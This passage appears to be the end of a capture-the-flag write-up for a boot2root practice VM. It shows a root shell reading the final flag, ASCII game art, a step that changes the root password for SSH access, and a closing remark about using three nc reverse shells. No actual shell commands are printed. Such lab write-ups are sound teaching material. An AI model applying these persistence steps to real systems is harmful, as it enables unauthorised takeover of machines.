drwxrwxrwt   2 root      root        40 Oct 30 12:41 .ICE-unix
drwx------   3 root      root        60 Oct 30 12:41 systemd-private-2694d3f2b22d4bf79fa7f1fde8306c46-chronyd.service-LubNt8
drwx------   3 root      root        60 Oct 30 12:41 systemd-private-2694d3f2b22d4bf79fa7f1fde8306c46-rtkit-daemon.service-UMqu6w
drwxrwxrwt   2 root      root        40 Oct 30 12:41 .Test-unix
drwxrwxrwt   2 root      root        40 Oct 30 12:41 .X11-unix
drwxrwxrwt   2 root      root        40 Oct 30 12:41 .XIM-unix
[root@localhost tmp]# cd
cd
[root@localhost ~]# ls
ls
flag.txt
[root@localhost ~]# cat flag.txt
cat flag.txt
[+] You're a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.  

+-----------------------------------------------------------------------------+
| |       |\              -~ /     \  /          |
|~~__     | \            | \/       /\          /|
|    --   |  \           | / \    /    \     /   |
|      |~_|   \      \___|/    \/         /      |
|--__  |   -- |\________________________________/~~\~~|    /  \     /     \   |
|   |~~--__  |~_|____|____|____|____|____|____|/ /  \/|\ /      \/          \/|
|   |      |~--_|__|____|____|____|____|____|_/ /|    |/ \    /   \       /   |
|___|______|__|_||____|____|____|____|____|__[]/_|----|    \/       \  /      |
|  \mmmm :   | _|___|____|____|____|____|____|___|  /\|   /  \      /  \      |
|      B :_--~~ |_|____|____|____|____|____|____|  |  |\/      \ /        \   |
|  __--P :  |  /   /  /  | \     /  \          /\|
|~~  |   :  | /    ~~~   |  \  /      \      /   |
|    |      |/                        .-.             |  /\          \  /     |
|    |      /                        |   |            |/   \          /\      |
|    |     /                        |     |            -_   \       /    \    |
+-----------------------------------------------------------------------------+
|          |  /|  |   |  2  3  4  | /~~~~~\ |       /|    |_| ....  ......... |
|          |  ~|~ | % |           | | ~J~ | |       ~|~ % |_| ....  ......... |
|   AMMO   |  HEALTH  |  5  6  7  |  \===/  |    ARMOR    |#| ....  ......... |
+-----------------------------------------------------------------------------+
            
		FLAG: kre0cu4jl4rzjicpo1i7z5l1

[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.

[+] You can follow me on twitter: @0katz

[+] Thanks to the homie: @Pink_P4nther
  • Callback successful; change to root's home directory and read the final flag.

Changing the password

Alternatively, run sudo passwd root to change the password and log in directly with full privileges.

$ ssh root@<target-ip>
root@<target-ip>'s password:
Last login: Tue Oct 30 13:52:06 2018 from 192.168.123.122
[root@localhost ~]# ls
flag.txt
[root@localhost ~]# cat flag.txt
[+] You're a soldier. 
[+] One of the best that the world could set against
[+] the demonic invasion.  

+-----------------------------------------------------------------------------+
| |       |\              -~ /     \  /          |
|~~__     | \            | \/       /\          /|
|    --   |  \           | / \    /    \     /   |
|      |~_|   \      \___|/    \/         /      |
|--__  |   -- |\________________________________/~~\~~|    /  \     /     \   |
|   |~~--__  |~_|____|____|____|____|____|____|/ /  \/|\ /      \/          \/|
|   |      |~--_|__|____|____|____|____|____|_/ /|    |/ \    /   \       /   |
|___|______|__|_||____|____|____|____|____|__[]/_|----|    \/       \  /      |
|  \mmmm :   | _|___|____|____|____|____|____|___|  /\|   /  \      /  \      |
|      B :_--~~ |_|____|____|____|____|____|____|  |  |\/      \ /        \   |
|  __--P :  |  /   /  /  | \     /  \          /\|
|~~  |   :  | /    ~~~   |  \  /      \      /   |
|    |      |/                        .-.             |  /\          \  /     |
|    |      /                        |   |            |/   \          /\      |
|    |     /                        |     |            -_   \       /    \    |
+-----------------------------------------------------------------------------+
|          |  /|  |   |  2  3  4  | /~~~~~\ |       /|    |_| ....  ......... |
|          |  ~|~ | % |           | | ~J~ | |       ~|~ % |_| ....  ......... |
|   AMMO   |  HEALTH  |  5  6  7  |  \===/  |    ARMOR    |#| ....  ......... |
+-----------------------------------------------------------------------------+

		FLAG: kre0cu4jl4rzjicpo1i7z5l1     

[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.

[+] You can follow me on twitter: @0katz

[+] Thanks to the homie: @Pink_P4nther

Lessons learned

This box is relatively hard and tests both patience and experience: three nc reverse shells in total. Honestly it took me several hours, with plenty of searching along the way, and I picked up some new techniques.
